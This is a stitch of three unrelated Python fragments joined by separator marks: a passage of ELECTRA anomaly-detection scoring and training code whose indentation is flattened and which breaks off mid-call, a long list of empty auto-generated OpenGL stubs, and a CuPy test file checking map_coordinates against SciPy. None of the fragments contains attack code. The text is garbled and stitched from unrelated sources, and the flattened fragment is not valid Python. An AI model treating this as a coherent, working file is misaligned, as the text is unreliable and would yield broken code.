repr_list.append(representations)
rtd_output = F.sigmoid(rtd_output).cpu().numpy()
rtd_full_probs = 1 - rtd_output
rtd_full_probs = np.expand_dims(rtd_full_probs, axis=-1)
rtd_full_probs = np.concatenate((rtd_full_probs, np.expand_dims(rtd_output, axis=-1)), axis=-1)
unsorted_outs_rtd_electra.append(np.expand_dims(rtd_full_probs, axis=1))
if len(rtd_output.shape) == 1:
rtd_output = np.expand_dims(rtd_output, 0)
row_sums_rtd = rtd_output.sum(axis=1)
rtd_output_normalized = rtd_output / row_sums_rtd[:, np.newaxis]
unsorted_outs_rtd.append(rtd_output_normalized)
break
else:
for mask_idx in range(self.extra_args['vanilla_electra']['no_masks']):
inputs, labels = mask_tokens_vanilla(
batch, tokenizer, args) if args.mlm else (batch, batch)
is_pad = [[1 if el == tokenizer.convert_tokens_to_ids(tokenizer.pad_token) else 0 for el in input_] for input_ in inputs]
is_pad = np.array(is_pad)
pad_labels.append(np.expand_dims(is_pad, axis=1))
labels_bin = [[0 if el == -100 else 1 for el in mask]
for mask in labels]
labels_bin = np.array(labels_bin)
binary_labels.append(np.expand_dims(labels_bin, axis=1))
inputs = inputs.to(self.device)
labels = labels.to(self.device)
output = model(inputs, masked_lm_labels=labels) if args.mlm else model(inputs, labels=labels)
rtd_output = output[6]
rtd_output = F.sigmoid(rtd_output).cpu().numpy()
rtd_full_probs = 1 - rtd_output
rtd_full_probs = np.expand_dims(rtd_full_probs, axis=-1)
rtd_full_probs = np.concatenate((rtd_full_probs, np.expand_dims(rtd_output, axis=-1)), axis=-1)
unsorted_outs_rtd_electra.append(np.expand_dims(rtd_full_probs, axis=1))
row_sums_rtd = rtd_output.sum(axis=1)
rtd_output_normalized = rtd_output / row_sums_rtd[:, np.newaxis]
unsorted_outs_rtd.append(rtd_output_normalized)
break
rtd_full_probs = np.concatenate(unsorted_outs_rtd_electra, axis=1)
binary_labels = np.concatenate(binary_labels, axis=1)
pad_labels = np.concatenate(pad_labels, axis=1)
if len(rtd_full_probs.shape) == 3:
rtd_full_probs = np.expand_dims(rtd_full_probs, 0)
if not ("vanilla_electra" in self.extra_args and self.extra_args["vanilla_electra"] != False):
unsorted_outs = np.concatenate(unsorted_outs, axis=0) # axis 0 is inference batch
repr_list = np.concatenate(repr_list, axis=0)
unsorted_outs = np.reshape(unsorted_outs, (masks_len, batch_size, rmd_classes))
unsorted_outs = np.transpose(unsorted_outs, (1, 0, 2))
scores_ne = np.zeros((unsorted_outs.shape[0], unsorted_outs.shape[1]))
scores_pl = np.zeros((unsorted_outs.shape[0], unsorted_outs.shape[1]))
scores_mp = np.zeros((unsorted_outs.shape[0], unsorted_outs.shape[1]))
unsorted_outs_rtd = np.concatenate(unsorted_outs_rtd, axis=0)
unsorted_outs_rtd = np.reshape(unsorted_outs_rtd, (masks_len, batch_size, self.extra_args["max_seq_length"]))
unsorted_outs_rtd = np.transpose(unsorted_outs_rtd, (1, 0, 2))
scores_pl_electra = np.zeros(
(unsorted_outs_rtd.shape[0], unsorted_outs_rtd.shape[1]))
scores_pl_electra_corrupt = np.zeros(
(unsorted_outs_rtd.shape[0], unsorted_outs_rtd.shape[1]))
scores_pl_electra_clean = np.zeros(
(unsorted_outs_rtd.shape[0], unsorted_outs_rtd.shape[1]))
scores_ne_electra_2 = np.zeros((unsorted_outs_rtd.shape[0], unsorted_outs_rtd.shape[1]))
scores_pl_electra_2 = np.zeros((unsorted_outs_rtd.shape[0], unsorted_outs_rtd.shape[1]))
scores_mp_electra_2 = np.zeros((unsorted_outs_rtd.shape[0], unsorted_outs_rtd.shape[1]))
self.current_batch_scores_pl = np.full_like(unsorted_outs_rtd, np.inf)
short_anomalies = 0
if not ("vanilla_electra" in self.extra_args and self.extra_args["vanilla_electra"] != False):
for b_el in range(unsorted_outs.shape[0]): #batch elem
for msk_idx in range(unsorted_outs.shape[1]):
scores_ne[b_el][msk_idx] = neg_entropy(unsorted_outs[b_el][msk_idx][:]) #batch_el, msk_id, probs
scores_pl[b_el][msk_idx] = unsorted_outs[b_el][msk_idx][msk_idx]
scores_mp[b_el][:] = np.max(unsorted_outs[b_el][:][:], axis=1)
score_mp_electra_2 = []
score_ne_electra_2 = []
score_pl_electra_2 = []
seq_len = np.count_nonzero(pad_labels[b_el][msk_idx]==0)
for seq_el in range(rtd_full_probs.shape[-2]): # for every el in seq
if seq_el == 0 or seq_el == rtd_full_probs.shape[-2] - 1:
continue
label_idx = binary_labels[b_el][msk_idx][seq_el]
score_ne_val = neg_entropy(rtd_full_probs[b_el][msk_idx][seq_el][:])
score_pl_val = rtd_full_probs[b_el][msk_idx][seq_el][label_idx]
score_mp_val = np.max(rtd_full_probs[b_el][msk_idx][seq_el][:])
if "short_anomalies" in self.extra_args:
if seq_len <= self.extra_args['short_anomalies']:
score_ne_val = 0
score_pl_val = 0
score_mp_val = 0
if pad_labels[b_el][msk_idx][seq_el] == 0:
score_mp_electra_2.append(score_mp_val)
score_ne_electra_2.append(score_ne_val)
self.current_batch = batch.numpy()
self.current_batch_scores_pl[b_el][msk_idx][seq_el] = score_pl_val
score_pl_electra_2.append(score_pl_val)
scores_ne_electra_2[b_el][msk_idx] = np.mean(score_ne_electra_2)
scores_pl_electra_2[b_el][msk_idx] = np.mean(score_pl_electra_2)
scores_mp_electra_2[b_el][msk_idx] = np.mean(score_mp_electra_2)
break
scores_ne = scores_ne.mean(axis=-1)
scores_pl = scores_pl.mean(axis=-1)
scores_mp = scores_mp.mean(axis=-1)
scores_ne_electra_2 = scores_ne_electra_2.mean(axis=-1)
scores_pl_electra_2 = scores_pl_electra_2.mean(axis=-1)
scores_mp_electra_2 = scores_mp_electra_2.mean(axis=-1)
return scores_pl, scores_mp, scores_ne, scores_pl_electra_2, scores_mp_electra_2, scores_ne_electra_2, repr_list
else:
for b_el in range(unsorted_outs_rtd.shape[0]): #batch elem
for msk_idx in range(self.extra_args['vanilla_electra']['no_masks']):
score_mp_electra_2 = []
score_ne_electra_2 = []
score_pl_electra_2 = []
for seq_el in range(rtd_full_probs.shape[-2]): # for every el in seq
if seq_el == 0 or seq_el == rtd_full_probs.shape[-2] - 1:
continue
# score_ne_electra[seq_el] = neg_entropy(rtd_full_probs[b_el][msk_idx][seq_el][:])
label_idx = binary_labels[b_el][msk_idx][seq_el]
# score_pl_electra[seq_el] = rtd_full_probs[b_el][msk_idx][seq_el][label_idx]
# score_mp_electra[seq_el] = np.max(rtd_full_probs[b_el][msk_idx][seq_el][:])
score_ne_val = neg_entropy(rtd_full_probs[b_el][msk_idx][seq_el][:])
score_pl_val = rtd_full_probs[b_el][msk_idx][seq_el][label_idx]
score_mp_val = np.max(rtd_full_probs[b_el][msk_idx][seq_el][:])
if pad_labels[b_el][msk_idx][seq_el] == 0:
score_mp_electra_2.append(score_mp_val)
score_ne_electra_2.append(score_ne_val)
self.current_batch = batch.numpy()
self.current_batch_scores_pl[b_el][msk_idx][seq_el] = score_pl_val
score_pl_electra_2.append(score_pl_val)
scores_ne_electra_2[b_el][msk_idx] = np.mean(score_ne_electra_2)
scores_pl_electra_2[b_el][msk_idx] = np.mean(score_pl_electra_2)
scores_mp_electra_2[b_el][msk_idx] = np.mean(score_mp_electra_2)
break
scores_ne_electra_2 = scores_ne_electra_2.mean(axis=-1)
scores_pl_electra_2 = scores_pl_electra_2.mean(axis=-1)
scores_mp_electra_2 = scores_mp_electra_2.mean(axis=-1)
return scores_pl_electra_2, score_mp_electra_2, scores_ne_electra_2
def train_anomaly(
self,
train_dataset,
eval_dataset,
eval_doc_dataset,
eval_doc_dataset_outliers,
show_running_loss=True,
verbose=True,
sched_params=None,
**kwargs,
):
"""
Trains the model on train_dataset.
Utility function to be used by the train_model() method. Not intended to be used directly.
"""
masks = self.masks
model = self.model
args = self.args
tokenizer = self.tokenizer
if self.extra_args['random_generator'] == False:
logger.info(' USING GENERATOR LOSS')
if self.extra_args['use_rtd_loss'] == True:
logger.info(' USING RTD LOSS')
if "vanilla_electra" in self.extra_args and self.extra_args["vanilla_electra"] != False:
logger.info(' USING ELECTRA-VANILLA-OD')
def collate(examples: List[torch.Tensor]):
if tokenizer._pad_token is None:
return pad_sequence(examples, batch_first=True)
return pad_sequence(examples,
batch_first=True,
padding_value=tokenizer.pad_token_id)
if self.is_world_master():
tb_writer = SummaryWriter(logdir=args.tensorboard_dir)
self.tb_writer = tb_writer
train_sampler = RandomSampler(train_dataset) if args.local_rank == -1 else DistributedSampler(train_dataset)
train_dataloader = DataLoader(train_dataset,
batch_size=args.train_batch_size,
sampler=train_sampler,
collate_fn=collate,
num_workers=4)
if self.extra_args['extract_repr']:
train_sampler_repr = RandomSampler(train_dataset) if args.local_rank == -1 else DistributedSampler(train_dataset)
train_dataloader_repr = DataLoader(train_dataset,
batch_size=args.train_batch_size,
sampler=train_sampler_repr,
collate_fn=collate,
num_workers=4)
if args.max_steps > 0:
t_total = args.max_steps
args.num_train_epochs = (
args.max_steps //
(len(train_dataloader) // args.gradient_accumulation_steps) +
1)
else:
t_total = len(
train_dataloader
) // args.gradient_accumulation_steps * args.num_train_epochs
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = [
{
# generator
"params": [
p for n, p in model.generator_model.named_parameters()
if not any(nd in n for nd in no_decay)
],
"weight_decay":
args.weight_decay,
"lr":
args.learning_rate * self.extra_args["mlm_lr_ratio"],
},
{
# generator w/o weight_decay
"params": [
p for n, p in model.generator_model.named_parameters()
if any(nd in n for nd in no_decay)
],
"lr":
args.learning_rate * self.extra_args["mlm_lr_ratio"],
}
]
# discriminator
disc_unique_params = []
for n, pgr in model.discriminator_model.named_parameters():
if n not in [
"electra.embeddings.word_embeddings.weight",
"electra.embeddings.position_embeddings.weight",
"electra.embeddings.token_type_embeddings.weight"
]:
disc_unique_params.append((n, pgr))
# print("Disc unique", n, pgr.shape)
optimizer_grouped_parameters.append({
"params": [
p for n, p in disc_unique_params
if not any(nd in n for nd in no_decay)
],
"weight_decay":
args.weight_decay,
"lr":
args.learning_rate,
})
optimizer_grouped_parameters.append({
"params": [
p for n, p in disc_unique_params
if any(nd in n for nd in no_decay)
],
"lr":
args.learning_rate,
})
# optimizer
warmup_steps = math.ceil(t_total * args.warmup_ratio)
args.warmup_steps = warmup_steps if args.warmup_steps == 0 else args.warmup_steps
if args.optimizer == "AdamW":
optimizer = AdamW(optimizer_grouped_parameters,
lr=args.learning_rate,
eps=args.adam_epsilon,
amsgrad=True)
else:
optimizer = SGD(optimizer_grouped_parameters,
lr=args.learning_rate,
momentum=0.9,
weight_decay=args.weight_decay)
pytorch_total_params = sum(p.numel() for p in model.parameters()
if p.requires_grad)
optimizer_total_params = 0
for pgroup in optimizer_grouped_parameters:
optimizer_total_params += sum(p.numel() for p in pgroup["params"])
assert (pytorch_total_params == optimizer_total_params)
tb_writer.add_text(f'total-params', str(pytorch_total_params), 0)
logger.info(f' TOTAL PARAMETERS: {pytorch_total_params}')
tb_writer.add_text(f'tokenizer-len', str(len(self.tokenizer)), 0)
logger.info(f' TOKENIZER LEN: {len(self.tokenizer)}')
tb_writer.add_text(f'args', str(self.extra_args))
if sched_params is not None:
if sched_params['sched_name'] == 'plateau':
from torch.optim.lr_scheduler import ReduceLROnPlateau
scheduler = ReduceLROnPlateau(
optimizer=optimizer,
factor=sched_params['factor'],
patience=sched_params['patience'],
verbose=sched_params['verbose'],
threshold=sched_params['threshold'],
min_lr=sched_params['min_lr'])
else:
scheduler = get_linear_schedule_with_warmup(
optimizer,
| |
pass
# --- Auto-generated OpenGL API stubs ------------------------------------------
# Placeholder definitions for the C-implemented ``gl*`` entry points.  Every
# stub accepts ``*argv`` (the real C signatures are not available to the
# generator — hence the literal "no string" docstrings) and does nothing.
# These exist purely so IDEs / static analysis can resolve the names;
# NOTE(review): this region appears machine-generated — regenerate rather
# than hand-edit.
def glColorMaterial(*argv):
    '''no string
    '''
    pass
def glCompileShader(*argv):
    '''no string
    '''
    pass
def glCopyPixels(*argv):
    '''no string
    '''
    pass
def glCopyTexImage2D(*argv):
    '''no string
    '''
    pass
def glCreateProgram(*argv):
    '''no string
    '''
    pass
def glCreateShader(*argv):
    '''no string
    '''
    pass
def glCullFace(*argv):
    '''no string
    '''
    pass
def glDeleteLists(*argv):
    '''no string
    '''
    pass
def glDeleteProgram(*argv):
    '''no string
    '''
    pass
def glDeleteShader(*argv):
    '''no string
    '''
    pass
def glDeleteTextures(*argv):
    '''no string
    '''
    pass
def glDepthFunc(*argv):
    '''no string
    '''
    pass
def glDepthMask(*argv):
    '''no string
    '''
    pass
def glDepthRange(*argv):
    '''no string
    '''
    pass
def glDetachShader(*argv):
    '''no string
    '''
    pass
def glDisable(*argv):
    '''no string
    '''
    pass
def glDrawBuffer(*argv):
    '''no string
    '''
    pass
def glDrawPixels(*argv):
    '''no string
    '''
    pass
def glEdgeFlag(*argv):
    '''no string
    '''
    pass
def glEdgeFlagv(*argv):
    '''no string
    '''
    pass
def glEnable(*argv):
    '''no string
    '''
    pass
def glEnd(*argv):
    '''no string
    '''
    pass
def glEndList(*argv):
    '''no string
    '''
    pass
def glEvalCoord1d(*argv):
    '''no string
    '''
    pass
def glEvalCoord1dv(*argv):
    '''no string
    '''
    pass
def glEvalCoord1f(*argv):
    '''no string
    '''
    pass
def glEvalCoord1fv(*argv):
    '''no string
    '''
    pass
def glEvalCoord2d(*argv):
    '''no string
    '''
    pass
def glEvalCoord2dv(*argv):
    '''no string
    '''
    pass
def glEvalCoord2f(*argv):
    '''no string
    '''
    pass
def glEvalCoord2fv(*argv):
    '''no string
    '''
    pass
def glEvalMesh1(*argv):
    '''no string
    '''
    pass
def glEvalMesh2(*argv):
    '''no string
    '''
    pass
def glEvalPoint1(*argv):
    '''no string
    '''
    pass
def glEvalPoint2(*argv):
    '''no string
    '''
    pass
def glFeedbackBuffer(*argv):
    '''no string
    '''
    pass
def glFinish(*argv):
    '''no string
    '''
    pass
def glFlush(*argv):
    '''no string
    '''
    pass
def glFogf(*argv):
    '''no string
    '''
    pass
def glFogfv(*argv):
    '''no string
    '''
    pass
def glFogi(*argv):
    '''no string
    '''
    pass
def glFogiv(*argv):
    '''no string
    '''
    pass
def glFrontFace(*argv):
    '''no string
    '''
    pass
def glFrustum(*argv):
    '''no string
    '''
    pass
def glGenLists(*argv):
    '''no string
    '''
    pass
def glGenTextures(*argv):
    '''no string
    '''
    pass
def glGetAttachedShaders(*argv):
    '''no string
    '''
    pass
def glGetBooleanv(*argv):
    '''no string
    '''
    pass
def glGetClipPlane(*argv):
    '''no string
    '''
    pass
def glGetDoublev(*argv):
    '''no string
    '''
    pass
def glGetError(*argv):
    '''no string
    '''
    pass
def glGetFloatv(*argv):
    '''no string
    '''
    pass
def glGetIntegerv(*argv):
    '''no string
    '''
    pass
def glGetLightfv(*argv):
    '''no string
    '''
    pass
def glGetLightiv(*argv):
    '''no string
    '''
    pass
def glGetMapdv(*argv):
    '''no string
    '''
    pass
def glGetMapfv(*argv):
    '''no string
    '''
    pass
def glGetMapiv(*argv):
    '''no string
    '''
    pass
def glGetMaterialfv(*argv):
    '''no string
    '''
    pass
def glGetMaterialiv(*argv):
    '''no string
    '''
    pass
def glGetPixelMapfv(*argv):
    '''no string
    '''
    pass
def glGetPixelMapuiv(*argv):
    '''no string
    '''
    pass
def glGetPixelMapusv(*argv):
    '''no string
    '''
    pass
def glGetPolygonStipple(*argv):
    '''no string
    '''
    pass
def glGetProgramInfoLog(*argv):
    '''no string
    '''
    pass
def glGetProgramiv(*argv):
    '''no string
    '''
    pass
def glGetShaderInfoLog(*argv):
    '''no string
    '''
    pass
def glGetShaderSource(*argv):
    '''no string
    '''
    pass
def glGetShaderiv(*argv):
    '''no string
    '''
    pass
def glGetString(*argv):
    '''no string
    '''
    pass
def glGetTexEnvfv(*argv):
    '''no string
    '''
    pass
def glGetTexEnviv(*argv):
    '''no string
    '''
    pass
def glGetTexGendv(*argv):
    '''no string
    '''
    pass
def glGetTexGenfv(*argv):
    '''no string
    '''
    pass
def glGetTexGeniv(*argv):
    '''no string
    '''
    pass
def glGetTexImage(*argv):
    '''no string
    '''
    pass
def glGetTexLevelParameterfv(*argv):
    '''no string
    '''
    pass
def glGetTexLevelParameteriv(*argv):
    '''no string
    '''
    pass
def glGetTexParameterfv(*argv):
    '''no string
    '''
    pass
def glGetTexParameteriv(*argv):
    '''no string
    '''
    pass
def glGetUniformLocation(*argv):
    '''no string
    '''
    pass
def glHint(*argv):
    '''no string
    '''
    pass
def glIndexMask(*argv):
    '''no string
    '''
    pass
def glIndexd(*argv):
    '''no string
    '''
    pass
def glIndexdv(*argv):
    '''no string
    '''
    pass
def glIndexf(*argv):
    '''no string
    '''
    pass
def glIndexfv(*argv):
    '''no string
    '''
    pass
def glIndexi(*argv):
    '''no string
    '''
    pass
def glIndexiv(*argv):
    '''no string
    '''
    pass
def glIndexs(*argv):
    '''no string
    '''
    pass
def glIndexsv(*argv):
    '''no string
    '''
    pass
def glInitNames(*argv):
    '''no string
    '''
    pass
def glIsEnabled(*argv):
    '''no string
    '''
    pass
def glIsList(*argv):
    '''no string
    '''
    pass
def glIsProgram(*argv):
    '''no string
    '''
    pass
def glIsShader(*argv):
    '''no string
    '''
    pass
def glIsTexture(*argv):
    '''no string
    '''
    pass
def glLightModelf(*argv):
    '''no string
    '''
    pass
def glLightModelfv(*argv):
    '''no string
    '''
    pass
def glLightModeli(*argv):
    '''no string
    '''
    pass
def glLightModeliv(*argv):
    '''no string
    '''
    pass
def glLightf(*argv):
    '''no string
    '''
    pass
def glLightfv(*argv):
    '''no string
    '''
    pass
def glLighti(*argv):
    '''no string
    '''
    pass
def glLightiv(*argv):
    '''no string
    '''
    pass
def glLineStipple(*argv):
    '''no string
    '''
    pass
def glLineWidth(*argv):
    '''no string
    '''
    pass
def glLinkProgram(*argv):
    '''no string
    '''
    pass
def glListBase(*argv):
    '''no string
    '''
    pass
def glLoadIdentity(*argv):
    '''no string
    '''
    pass
def glLoadMatrixd(*argv):
    '''no string
    '''
    pass
def glLoadMatrixf(*argv):
    '''no string
    '''
    pass
def glLoadName(*argv):
    '''no string
    '''
    pass
def glLogicOp(*argv):
    '''no string
    '''
    pass
def glMap1d(*argv):
    '''no string
    '''
    pass
def glMap1f(*argv):
    '''no string
    '''
    pass
def glMap2d(*argv):
    '''no string
    '''
    pass
def glMap2f(*argv):
    '''no string
    '''
    pass
def glMapGrid1d(*argv):
    '''no string
    '''
    pass
def glMapGrid1f(*argv):
    '''no string
    '''
    pass
def glMapGrid2d(*argv):
    '''no string
    '''
    pass
def glMapGrid2f(*argv):
    '''no string
    '''
    pass
def glMaterialf(*argv):
    '''no string
    '''
    pass
def glMaterialfv(*argv):
    '''no string
    '''
    pass
def glMateriali(*argv):
    '''no string
    '''
    pass
def glMaterialiv(*argv):
    '''no string
    '''
    pass
def glMatrixMode(*argv):
    '''no string
    '''
    pass
def glMultMatrixd(*argv):
    '''no string
    '''
    pass
def glMultMatrixf(*argv):
    '''no string
    '''
    pass
def glNewList(*argv):
    '''no string
    '''
    pass
def glNormal3b(*argv):
    '''no string
    '''
    pass
def glNormal3bv(*argv):
    '''no string
    '''
    pass
def glNormal3d(*argv):
    '''no string
    '''
    pass
def glNormal3dv(*argv):
    '''no string
    '''
    pass
def glNormal3f(*argv):
    '''no string
    '''
    pass
def glNormal3fv(*argv):
    '''no string
    '''
    pass
def glNormal3i(*argv):
    '''no string
    '''
    pass
def glNormal3iv(*argv):
    '''no string
    '''
    pass
def glNormal3s(*argv):
    '''no string
    '''
    pass
def glNormal3sv(*argv):
    '''no string
    '''
    pass
def glOrtho(*argv):
    '''no string
    '''
    pass
def glPassThrough(*argv):
    '''no string
    '''
    pass
def glPixelMapfv(*argv):
    '''no string
    '''
    pass
def glPixelMapuiv(*argv):
    '''no string
    '''
    pass
def glPixelMapusv(*argv):
    '''no string
    '''
    pass
def glPixelStoref(*argv):
    '''no string
    '''
    pass
def glPixelStorei(*argv):
    '''no string
    '''
    pass
def glPixelTransferf(*argv):
    '''no string
    '''
    pass
def glPixelTransferi(*argv):
    '''no string
    '''
    pass
def glPixelZoom(*argv):
    '''no string
    '''
    pass
def glPointSize(*argv):
    '''no string
    '''
    pass
def glPolygonMode(*argv):
    '''no string
    '''
    pass
def glPolygonOffset(*argv):
    '''no string
    '''
    pass
def glPolygonStipple(*argv):
    '''no string
    '''
    pass
def glPopAttrib(*argv):
    '''no string
    '''
    pass
def glPopClientAttrib(*argv):
    '''no string
    '''
    pass
def glPopMatrix(*argv):
    '''no string
    '''
    pass
def glPopName(*argv):
    '''no string
    '''
    pass
def glPrioritizeTextures(*argv):
    '''no string
    '''
    pass
def glPushAttrib(*argv):
    '''no string
    '''
    pass
def glPushClientAttrib(*argv):
    '''no string
    '''
    pass
def glPushMatrix(*argv):
    '''no string
    '''
    pass
def glPushName(*argv):
    '''no string
    '''
    pass
def glRasterPos2d(*argv):
    '''no string
    '''
    pass
def glRasterPos2dv(*argv):
    '''no string
    '''
    pass
def glRasterPos2f(*argv):
    '''no string
    '''
    pass
def glRasterPos2fv(*argv):
    '''no string
    '''
    pass
def glRasterPos2i(*argv):
    '''no string
    '''
    pass
def glRasterPos2iv(*argv):
    '''no string
    '''
    pass
def glRasterPos2s(*argv):
    '''no string
    '''
    pass
def glRasterPos2sv(*argv):
    '''no string
    '''
    pass
def glRasterPos3d(*argv):
    '''no string
    '''
    pass
def glRasterPos3dv(*argv):
    '''no string
    '''
    pass
def glRasterPos3f(*argv):
    '''no string
    '''
    pass
def glRasterPos3fv(*argv):
    '''no string
    '''
    pass
def glRasterPos3i(*argv):
    '''no string
    '''
    pass
def glRasterPos3iv(*argv):
    '''no string
    '''
    pass
def glRasterPos3s(*argv):
    '''no string
    '''
    pass
def glRasterPos3sv(*argv):
    '''no string
    '''
    pass
def glRasterPos4d(*argv):
    '''no string
    '''
    pass
def glRasterPos4dv(*argv):
    '''no string
    '''
    pass
def glRasterPos4f(*argv):
    '''no string
    '''
    pass
def glRasterPos4fv(*argv):
    '''no string
    '''
    pass
def glRasterPos4i(*argv):
    '''no string
    '''
    pass
def glRasterPos4iv(*argv):
    '''no string
    '''
    pass
def glRasterPos4s(*argv):
    '''no string
    '''
    pass
def glRasterPos4sv(*argv):
    '''no string
    '''
    pass
def glReadBuffer(*argv):
    '''no string
    '''
    pass
def glReadPixels(*argv):
    '''no string
    '''
    pass
def glRectd(*argv):
    '''no string
    '''
    pass
def glRectdv(*argv):
    '''no string
    '''
    pass
def glRectf(*argv):
    '''no string
    '''
    pass
def glRectfv(*argv):
    '''no string
    '''
    pass
def glRecti(*argv):
    '''no string
    '''
    pass
def glRectiv(*argv):
    '''no string
    '''
    pass
def glRects(*argv):
    '''no string
    '''
    pass
def glRectsv(*argv):
    '''no string
    '''
    pass
def glRenderMode(*argv):
    '''no string
    '''
    pass
def glRotated(*argv):
    '''no string
    '''
    pass
def glRotatef(*argv):
    '''no string
    '''
    pass
def glScaled(*argv):
    '''no string
    '''
    pass
def glScalef(*argv):
    '''no string
    '''
    pass
def glScissor(*argv):
    '''no string
    '''
    pass
def glSelectBuffer(*argv):
    '''no string
    '''
    pass
def glShadeModel(*argv):
    '''no string
    '''
    pass
def glShaderSource(*argv):
    '''no string
    '''
    pass
def glStencilFunc(*argv):
    '''no string
    '''
    pass
def glStencilMask(*argv):
    '''no string
    '''
    pass
def glStencilOp(*argv):
    '''no string
    '''
    pass
def glTexCoord1d(*argv):
    '''no string
    '''
    pass
def glTexCoord1dv(*argv):
    '''no string
    '''
    pass
def glTexCoord1f(*argv):
    '''no string
    '''
    pass
def glTexCoord1fv(*argv):
    '''no string
    '''
    pass
def glTexCoord1i(*argv):
| |
<filename>tests/cupyx_tests/scipy_tests/ndimage_tests/test_interpolation.py<gh_stars>1000+
import numpy
import pytest
import cupy
from cupy.cuda import runtime
from cupy import testing
import cupyx.scipy.ndimage
from cupyx.scipy.ndimage import _util
# SciPy is optional at import time: the tests that actually require it are
# gated with ``@testing.with_requires('scipy')``.
try:
    import scipy
    import scipy.ndimage

    scipy_version = numpy.lib.NumpyVersion(scipy.__version__)
except ImportError:
    # Bug fix: the original ``pass`` left ``scipy_version`` undefined, so any
    # later comparison (e.g. ``scipy_version < '1.6.0'``) raised NameError
    # instead of the intended clean skip.  Bind a sentinel "older than
    # everything" version instead.
    scipy_version = numpy.lib.NumpyVersion('0.0.0')

# OpenCV is likewise optional (only the OpenCV comparison tests use it).
try:
    import cv2
except ImportError:
    pass

# testing these modes can only be tested against SciPy >= 1.6.0+
scipy16_modes = ['wrap', 'grid-wrap', 'reflect', 'grid-mirror',
                 'grid-constant']
# these modes are okay to test on older SciPy
legacy_modes = ['constant', 'nearest', 'mirror']
def _conditional_scipy_version_skip(mode, order):
    """Skip the running test when the installed SciPy is too old.

    Per the ``scipy16_modes`` note above, those boundary modes — and any
    spline order above 1 except under 'mirror' — can only be validated
    against SciPy >= 1.6.0.
    """
    needs_scipy16 = mode in scipy16_modes or (order > 1 and mode != 'mirror')
    if needs_scipy16 and scipy_version < '1.6.0':
        pytest.skip(
            'SciPy >= 1.6.0 needed to test this mode/order combination.')
@testing.parameterize(*testing.product({
    'output': [None, numpy.float64, 'f', float, 'empty'],
    'order': [0, 1, 2, 3, 4, 5],
    'mode': ['constant', 'nearest', 'mirror'] + scipy16_modes,
    'cval': [1.0],
    'prefilter': [True],
}))
@testing.gpu
@testing.with_requires('scipy')
class TestMapCoordinates:
    """Cross-check cupyx map_coordinates against scipy.ndimage over the
    parameterized output specs, spline orders, and boundary modes."""

    _multiprocess_can_split = True

    def _map_coordinates(self, xp, scp, a, coordinates):
        # Shared driver: honor the SciPy version gate, then call either with
        # a caller-preallocated output array ('empty') or with the
        # parameterized ``self.output`` spec.
        _conditional_scipy_version_skip(self.mode, self.order)
        map_coordinates = scp.ndimage.map_coordinates
        if self.output == 'empty':
            output = xp.empty(coordinates.shape[1:], dtype=a.dtype)
            return_value = map_coordinates(a, coordinates, output, self.order,
                                           self.mode, self.cval,
                                           self.prefilter)
            # In-place form returns None (or the output array itself).
            assert return_value is None or return_value is output
            return output
        else:
            return map_coordinates(a, coordinates, self.output, self.order,
                                   self.mode, self.cval, self.prefilter)

    @testing.for_float_dtypes(no_float16=True)
    @testing.numpy_cupy_allclose(atol=1e-4, scipy_name='scp')
    def test_map_coordinates_float(self, xp, scp, dtype):
        a = testing.shaped_random((100, 100), xp, dtype)
        coordinates = testing.shaped_random((a.ndim, 100), xp, dtype)
        return self._map_coordinates(xp, scp, a, coordinates)

    @testing.for_complex_dtypes()
    @testing.numpy_cupy_allclose(atol=1e-4, scipy_name='scp')
    @testing.with_requires('scipy>=1.6.0')
    def test_map_coordinates_complex_float(self, xp, scp, dtype):
        # promote output to a complex dtype
        if self.output == numpy.float64:
            self.output = numpy.complex128
        elif self.output == float:
            self.output = complex
        elif self.output == 'f':
            self.output = 'F'
        a = testing.shaped_random((100, 100), xp, dtype)
        coordinates = testing.shaped_random((a.ndim, 100), xp, xp.float64)
        return self._map_coordinates(xp, scp, a, coordinates)

    @testing.for_float_dtypes(no_float16=True)
    @testing.numpy_cupy_allclose(atol=1e-4, scipy_name='scp')
    def test_map_coordinates_fortran_order(self, xp, scp, dtype):
        # Same as the float test, but with F-contiguous inputs.
        a = testing.shaped_random((100, 100), xp, dtype)
        coordinates = testing.shaped_random((a.ndim, 100), xp, dtype)
        a = xp.asfortranarray(a)
        coordinates = xp.asfortranarray(coordinates)
        return self._map_coordinates(xp, scp, a, coordinates)

    @testing.for_float_dtypes(no_float16=True)
    @testing.numpy_cupy_allclose(atol=1e-4, scipy_name='scp')
    def test_map_coordinates_float_nd_coords(self, xp, scp, dtype):
        # Coordinates with extra trailing dimensions (n-d coordinate grid).
        a = testing.shaped_random((100, 100), xp, dtype)
        coordinates = testing.shaped_random((a.ndim, 10, 10), xp, dtype,
                                            scale=99.0)
        return self._map_coordinates(xp, scp, a, coordinates)

    @testing.for_int_dtypes(no_bool=True)
    @testing.numpy_cupy_allclose(atol=1e-4, scipy_name='scp')
    def test_map_coordinates_int(self, xp, scp, dtype):
        # Old SciPy lacks support for some platform int widths; remap them.
        if numpy.lib.NumpyVersion(scipy.__version__) < '1.0.0':
            if dtype in (numpy.dtype('l'), numpy.dtype('q')):
                dtype = numpy.int64
            elif dtype in (numpy.dtype('L'), numpy.dtype('Q')):
                dtype = numpy.uint64
        a = testing.shaped_random((100, 100), xp, dtype)
        coordinates = testing.shaped_random((a.ndim, 100), xp, dtype)
        out = self._map_coordinates(xp, scp, a, coordinates)
        # Values that interpolate to exactly .5 may round differently per
        # backend; zero them out so the comparison ignores those ties.
        float_out = self._map_coordinates(xp, scp, a.astype(xp.float64),
                                          coordinates) % 1
        half = xp.full_like(float_out, 0.5)
        out[xp.isclose(float_out, half, atol=1e-5)] = 0
        return out
@testing.parameterize(*testing.product({
    'order': [0, 1, 2, 3, 4, 5],
    'mode': ['constant', 'nearest', 'mirror'] + scipy16_modes,
}))
@testing.gpu
@testing.with_requires('scipy')
class TestMapCoordinatesHalfInteger:
    """Regression tests for rounding at exact half-integer coordinates."""

    def _map_coordinates(self, xp, scp, a, coordinates):
        _conditional_scipy_version_skip(self.mode, self.order)
        fn = scp.ndimage.map_coordinates
        return fn(a, coordinates, None, self.order, self.mode)

    @testing.for_float_dtypes(no_float16=True)
    @testing.numpy_cupy_allclose(atol=1e-4, scipy_name='scp')
    def test_map_coordinates_float(self, xp, scp, dtype):
        # Half-integer coordinate rounding case reported in:
        # https://github.com/cupy/cupy/issues/4550
        a = testing.shaped_arange((4, 3), xp, dtype)
        coordinates = xp.array([[0.5, 2], [0.5, 1]])
        return self._map_coordinates(xp, scp, a, coordinates)
